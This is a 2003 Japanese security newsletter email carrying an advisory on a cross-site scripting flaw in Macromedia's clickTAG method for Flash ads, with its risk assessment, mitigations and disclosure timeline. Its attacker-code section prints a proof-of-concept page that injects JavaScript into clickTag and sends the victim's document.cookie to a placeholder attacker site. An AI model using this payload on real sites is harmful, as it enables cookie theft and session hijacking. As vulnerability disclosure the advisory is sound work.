Return-Path: press@v23.org
Date: Tue, 15 Apr 2003 13:11:37 +0900 (JST)
Message-Id: <200304150411.h3F4Bbt07311@t125.pubzine.net>
From: press@v23.org
To: kjm@rins.ryukoku.ac.jp
Subject: =?ISO-2022-JP?B?GyRCIVobKEI=?=Vagabond PressClub
	=?ISO-2022-JP?B?GyRCIVshQRsoQg==?=Scan ExtraIssue
	=?ISO-2022-JP?B?GyRCIUEbKEI=?= 2003/04/15
Content-Type: text/plain; charset=ISO-2022-JP
MIME-version: 1.0

□〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜Vagabond Press Club 〜〜〜〜〜□
　　　　　バガボンド　プレスクラブ
□〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜□

　◇セキュリティマガジン　Scan Security Wire　増刊号　(2003/04/15)◇

------------------------------------------------------------〔Info〕--
セキュリティメルマガ　　　　　●４誌を合わせた『特別セット』でのご提供
　　┏┓┏┓　　　　　　　　　●通常価格と比べ、最大約８５％オフ
春の┣┫┗┓％オフキャンペーン●既存の読者様は購読期間の追加が可能！
　　┗┛┗┛　　　　　　　　　●５月３１日までの期間限定！☆お早めに！
詳細はこちら→ https://shop.vagabond.co.jp/cgi-bin/mm/p.cgi?85_sce 
----------------------------------------------------------------------

▼編集部よりお知らせ━━━━━━━━━━━━━━━━━━━━━━━━━
 「バガボンド　プレスクラブ」に会員登録されている方は、今回の増刊号の
　内容を会員規約にのっとった形式で、無償でご自由に転載できます。
 「バガボンド　プレスクラブ」ご入会は下記URLで受け付けております。

 イントラネット向け転載
 http://vagabond.co.jp/press_y/index.html
 媒体社向け転載
 http://vagabond.co.jp/press/index.html


■増刊号の内容

　○Flash AD に CSS 脆弱性


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
●Flash AD に CSS 脆弱性
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

　この脆弱性は、匿名の第三者が発見したものを、SCAN編集部が提携先である
イスラエル SecuriTeam とともに検証を行ったものである。
匿名の方およびイスラエル SecuriTeam に誌面を借りてお礼申し上げます。


>> この問題についての発表内容の相違に関する説明

　この問題については、マクロメディア社、SecuriTeam、Scan Daily EXpress
 が公表を行っている。
　それぞれの意見の違いにより、内容が微妙に異なる。
　脆弱性の説明にあたり、3者（マクロメディア社、 SecuriTeam、Scan Daily
 EXpress ）の関係者の間の基本的な意見の相違を説明する。

・影響範囲に関する意見の相違
　マクロメディア社：影響を受けるサイトは少数の大手広告配信事業者に限定
される。
　SecuriTeam：この件については特に言明なし
　Scan Daily EXpress：大手広告配信事業者以外の大手サイトにも同種の問題
を発見しているため、影響を受ける範囲は大手広告配信事業者に限定されない
可能性がある。

・リスクの評価に関する意見の相違
　マクロメディア社：大手広告配信事業者のサイト上には重要な個人情報はほ
とんどないと考えられる。そのため、個人情報漏洩などのリスクは低いといえ
る。
　SecuriTeam ：機構上、クロスサイトスクリプティング脆弱性がある以上、
リスクは確かに存在している。
　Scan Daily EXpress：大手広告配信事業者以外の大手サイトにも同種の問題
がある以上、個人情報漏洩の可能性は否定できない。このリスクは大きい。
　大手広告配信事業者以外のサイトに危険性を知らせるためには、起こりうる
可能性とリスクについて明記すべきである。


>> 問題の概要

　マクロメディア社が推奨している Flash AD の方法には、任意のスクリプト
をインジェクションできる問題があった。
　この問題を悪用することで、クロスサイトスクリプティング（CSS）などの
攻撃を行うことが可能となっていた。
　cookie の盗用、セッションハイジャック（Persistent Cookie のみでのセ
ッション管理をしている場合）が可能である。

マクロメディア社の発表したこの問題の内容
　＊マクロメディア社の説明は、広告管理に関するものに限定して説明を行っ
ている。そのため、同じドメインで発行されている cookie の盗用のリスクに
ついての説明が抜けている。管理者は、同じドメイン上の他の cookie 盗用に
ついても注意が必要である。
 http://www.macromedia.com/support/flash/ts/documents/clicktag_security.htm
 修正された Flash AD 制作ガイド
 http://www.macromedia.com/resources/richmedia/tracking/designers_guide/
SecuriTeam による発表
http://www.securiteam.com/securitynews/5XP0B0U9PE.html


>> サイト利用者に対するリスク

　サイト利用者は Flash AD を掲載しているサイト（広告が表示されているサ
イトではなく、Flash ファイルのおかれているサイト）の cookie を盗用され
るリスクがある。リスクは当該サイト（Flash ファイルのおかれているサイ
ト）で発行している cookie の内容によって異なる。
　広告のトラッキングのみに利用している場合のリスクは低い。認証や個人を
特定するための情報を含んだ cookie を発行している場合のリスクは高い。
　ターゲットとなる cookie は、 Flash AD を掲載しているページだけでなく、
同じドメインに存在しているすべての cookie が対象となる。
　単に外部の広告配信サイトの Flash ファイルを表示している場合は問題な
い。

　問題に対する対応はじゃっかん遅かったが、日本と本社との連携も行われて
いた。問題発見後、同社（米国）は主要な広告利用者に個別に連絡を行った模
様である。問題発見後の事後対処体制比較的整備されていると考えられる。た
だし、公表された内容には同じドメインの他の cookie が盗まれる危険性につ
いての記述がない。このため、発表内容からより悪意ある第三者に深刻度の高
い攻撃方法を類推されるという2次的なリスクが生じている。
　マクロメディア社では、Flash AD に用いる Flash ファイルをおいているの
は少数の大手広告配信事業者に限定されていると判断している。それらのサイ
トでは、重要な情報を cookie で配布していないため、リスクは低いとコメン
トしている。

　Scan Daily EXpress が確認した範囲では、大手サイト内に、Flash AD に用
いる Flash ファイルがおかれていた。例えば、大手サイトの中には、
http://大手サイト/ad/clients/ddip/030414ddip.swf や
http://大手サイト/adv/composite/20030324/y-0324conpojitte_p.swf のよう
に自社のサイト内に Flash ファイルをおいているケースがある。
　これらのサイトでは、上記の危険が存在している。また、同様なサイトが他
にも存在する可能性があると考えた。

　セキュリティリスク：高
　（マクロメディア社では低と判断されている）
　マネジメントリスク：低


>> 影響の範囲

　すべての Flash プレイヤーに影響がある。
　すべての clickTAG を用いていた Flash AD を利用しているサイト（広告が
表示されているサイトではなく、Flash ファイルのおかれているサイト）に影
響がある。

　Flash AD を配信もしくは自社サイトに設置している事業者には、迅速な対
応を期待したい。


>> 脆弱な個所

　Flash AD では、「getURL(clickTAG)」を用いて広告のトラッキングを行う
方法を推奨していた。
　しかし、「clickTAG」に第三者がスクリプトを仕込むことが可能であり、仕
込まれたスクリプトを「getURL()」は、無効化することができない。
　そのため、スクリプトを用いたクロスサイトスクリプティングが可能となっ
ている。


>> 想定される悪用方法

　サイトＡが、 Flash AD を用いている（サイト上に Flash ファイルを設
置）ケースを想定。
　攻撃者Ｂは、攻撃用サイトＣを作り、そこにサイトＡのFLASHに、スクリプ
トをインジェクションして、誰かがサイトを訪れるのを待つ。
　サイトＣを訪れたＤという人物がFLASHをクリックすると、インジェクショ
ンされたスクリプトが実行される。
　この時、ブラウザは、サイトＡのスクリプトを実行していると解釈する（こ
れはブラウザの脆弱性ではない）。そのため、サイトＡのスクリプトでなけれ
ばできないこと＝Ｄ氏の cookie 盗用、セッションハイジャック（これ以外の
攻撃も可能）などを行うことが可能になる。なお、Ｄ氏が事前にサイトＡの 
cookie をもっていなければセッションハイジャックの危険はない。

＊対象となる cookie は、 Flash AD が掲載されているドメイン（サイト上に
 Flash ファイルを設置）で発行されているものとなる。そのため当該ドメイ
ンで認証などの重要な情報を cookie を用いて管理した場合、深刻な問題とな
る。単に外部の広告配信サイトの Flash ファイルを表示している場合は問題
ない。

・攻撃者コードの例
　（下記のコード）は匿名の発見者のコードを一部伏字にしたのものである）
攻撃用サイトＣに下記のコードを記述します。

<HTML>
<HEAD>
<meta http-equiv=Content-Type content="text/html;  charset=SHIFT_JIS">
<TITLE>banner</TITLE>
<script language="JavaScript">
<!--
function openWindow() {

win=window.open("http://サイトＡ/banner_b.swf?clickTag=javascript%
3Awindow.open%28%27http%3A%2F%2Fwww.サイトＣ/message.html%3F%27+%2B+
document.cookie%2C%27_top%27%29","popup",'statusbar.visible =　false,
scrollbars=1,width=400,height=60');
}
//-->
</script>
</HEAD>
<BODY bgcolor="#FFFFFF" onLoad="openWindow();">
hoge
</BODY>
</HTML>

　攻撃用サイトＣのページを開いたと同時に、popupウインドウが開く。
　popup では、盗もうとしている cookie の発行元（サイトＡ）の flash フ
ァイルの clickTAG に cookie を盗むスクリプトを仕込んである。
　Ｄ氏がクリックすると、サイトＡがＤ氏に発行した cookieが、攻撃者のサ
イトＣに渡される。

　また、フレームを用いて、下部に Flash AD を表示させることにより、違和
感なく利用者を誘導することも可能である。


>> 対処方法

　マクロメディア社では、Flash にスクリプトを無効化する機能をつけないと
明言しているため、「getURL(clickTAG)」の利用による危険は続いている。
　事前に、「clickTAG」で与えられるパラメータが "http://" ではじまって
いないものを排除する処理をマクロメディア社では推奨している。
　一般的に、不正なコードに対する措置には、サニタイジング（クロスサイト
スクリプティングに利用される可能性のある文字列を無効化する方法）を用い
ることが推奨されている。「clickTAG」で与えられる文字列に対するサニタイ
ジングの方法が確立されれば、さらに安全な利用が期待できる。

　なお、もっとも単純で有効な対処方法は、Flash ファイルを置くためだけの
サブドメインを用意することである。これにより、攻撃者が奪取できる 
cookie は、当該サブドメイン上のもののみとなり、ほとんどの危険は回避で
きる。

　また、利用者の自衛策として javascript をオフにすることも有効である。
オフであれば、クロスサイトスクリプティングは動かない。オフであっても
「clickTAG」は正常に動作する。


>> 当該ベンダへの連絡と対処状況

 マクロメディア社の発表したこの問題の内容
 （ここにある内容には前述した同じドメイン上の他の cookie 盗用の危険性
が記述されていないので注意）
 http://www.macromedia.com/support/flash/ts/documents/clicktag_security.htm
 修正された Flash AD 制作ガイド
 http://www.macromedia.com/resources/richmedia/tracking/designers_guide/

・連絡経緯（日時はいずれも日本時間）

2003年3月28日　匿名の発見者より最初の連絡が編集部に届く。編集部で検証
を開始する。

2003年4月1日　匿名の発見者からテストコードを含む連絡が届く。編集部での
検証が完了する。

2003年4月2日　マクロメディア（日本）社に編集部より連絡を行う。

2003年4月3日　編集部提携先であるイスラエル SecuriTeam(Beyond Security 
Ltd.) に連絡し、日本版以外での検証などを依頼する。

2003年4月4日　イスラエル SecuriTeam(Beyond Security Ltd.) からマクロメ
ディア（米国）社の「international security contact」に連絡したいとの申
し出が来る。了解する。

2003年4月7日　マクロメディア（日本）社から最初の回答が届く。問題の内容
について、誤解があったため、再度、編集部よりくわしい説明を返信する。
同じ頃、イスラエル SecuriTeam(Beyond Security Ltd.) にも
「international security contact」から同じような回答が届き、SecuriTeam
 が説明に困っている旨の連絡がある。

2003年4月11日　マクロメディア（日本）社より本社と連携して対処中である
旨の連絡が届く。電話で検証チームと話しをしたい旨の依頼を受ける。検証担
当がいないため、電話連絡は月曜になる。
マクロメディア社（米国）がこの問題を WEB に掲載する。

2003年4月12日　イスラエル SecuriTeam(Beyond Security Ltd.) からマクロ
メディア社（米国）が対処を完了した旨の連絡が編集部に入る。
編集部よりイスラエル SecuriTeam(Beyond Security Ltd.)に、マクロメディ
ア（米国）社の公表内容に関する問題（同一ドメインの他ページの cookie 漏
洩問題）を連絡。
イスラエル SecuriTeam(Beyond Security Ltd.)より、マクロメディア（米
国）社にこの問題を連絡。

2003年4月14日　マクロメディア（日本）と電話による情報交換。マクロメデ
ィア社（米国）の WEB に同一ドメインの他の cookie 漏洩の問題を掲載しな
かった理由および Flash による不正コードチェックについて確認を行う。
上記を反映した発表内容をマクロメディア社（日本）に送付し、主として技術
内容に関しての確認を行う。
並行してイスラエル SecuriTeam(Beyond Security Ltd.)に、サブドメインを
利用した問題回避方法を送る。同サイト上に "Workaround" として掲載された。
夕方、マクロメディア社（日本）と電話で送付した発表内容に関する情報交換
を行う。その内容をもとにさらに修正を加える。


------------------------------------------------------------〔Info〕--
モニター販売につき、限定50本で【定価998,000円が98,000円】に！
┏<自治体向け>━━━━━━━━━┓・迅速、簡単に導入可能
┃セキュリティポリシー導入パック┃・住基ネット環境に対応（国内初）
┗━━━━━━━━━━━━━━━┛・必要不可欠な対策基準を網羅
詳細→ https://shop.vagabond.co.jp/cgi-bin/mm/p.cgi?epj01_sce 
----------------------------------------------------------------------

〓〓〓〓〓〓〓Scanは下記の各社にご協賛頂いております〓〓〓〓〓〓〓〓〓

RSAセキュリティ株式会社（ http://www.rsasecurity.co.jp/ ）

トレンドマイクロ株式会社（ http://www.trendmicro.co.jp/ ）

日本エフ・セキュア株式会社（ http://www.F-secure.co.jp/ ）

日本ネットワークアソシエイツ株式会社（ http://www.nai.com/japan/ ）

株式会社シマンテック（ http://www.symantec.co.jp/ ）

NRIセキュアテクノロジーズ株式会社（ http://www.nri-secure.co.jp/ ）

テクマトリックス株式会社（ http://www.techmatrix.co.jp/ ）

株式会社ジェイエムシー（ http://www.jmc.ne.jp/ ）

セコムトラストネット株式会社（ http://www.secomtrust.net/ ）

横河電機株式会社（ http://www.yokogawa.co.jp/ ）

株式会社アラジンジャパン（ http://www.aladdin.co.jp/ ）

コンピュータ・アソシエイツ株式会社（ http://www.caj.co.jp/ ）

ブルーコートシステムズ株式会社（ http://www.bluecoat.co.jp/ ）


▼情報公開原則━━━━━━━━━━━━━━━━━━━━━━━━━━━━
　編集部のセキュリティ情報の公開の考え方については下記をご参照ください。
　情報公開原則 : http://vagabond.co.jp/c2/info_dis_pri.htm

▼お知らせ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
　セキュリティ関連製品やイベント情報、リリースなどございましたら、
お気軽にScan編集部 scan@vagabond.co.jp あてにお送りください。


┏━ バガボンド社メールマガジン ━━━━━━━━━━━━━━━━━━┓

　◆「Scan Security Wire」
　　国内最大のコンピュータセキュリティ専門誌
　　 http://shop.vagabond.co.jp/m-ssw01.shtml 

　◆「Scan Daily Express」
　　セキュリティホール・ウイルス情報等を日刊で配信
　　 http://shop.vagabond.co.jp/m-sdx01.shtml 

　◆「Scan Security Management」
　　今注目のネットワークにまつわる規格・制度をわかりやすく解説！
　　 http://shop.vagabond.co.jp/m-ssm01.shtml 

　◆「Scan Tech Report」
　　Exploitコード・セキュリティツールを解説する技術情報専門誌
　　 http://shop.vagabond.co.jp/m-str01.shtml 

　◆「Scan WEB Security」
　　Webアプリケーションに特化したセキュリティ専門誌
　　 http://shop.vagabond.co.jp/m-sws01.shtml 

　−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
　◇「アドバイザリー・バガボンド」
　　 バガボンド社リリースのメールマガジン・調査資料販売サイト
　　 http://shop.vagabond.co.jp/ 

┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
     ★ 広告募集中！ お問い合わせは ad@vagabond.ne.jp 迄 ★
       料 金 体 系 → http://vagabond.co.jp/top/mail/index.html 
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

***************************読者の皆様へ*******************************
------------------株式会社バガボンド　Ｓｃａｎ編集部------------------
　　　　　　　　  http://www.vagabond.co.jp/c2/scan/
　Copyright（c）　2003　Vagabond　co,.Ltd　All　Rights　Reserved.
**********************************************************************

--------------------------------------------------
発行：株式会社バガボンド

お問い合わせ先
http://shop.vagabond.co.jp/
press@v23.org
--------------------------------------------------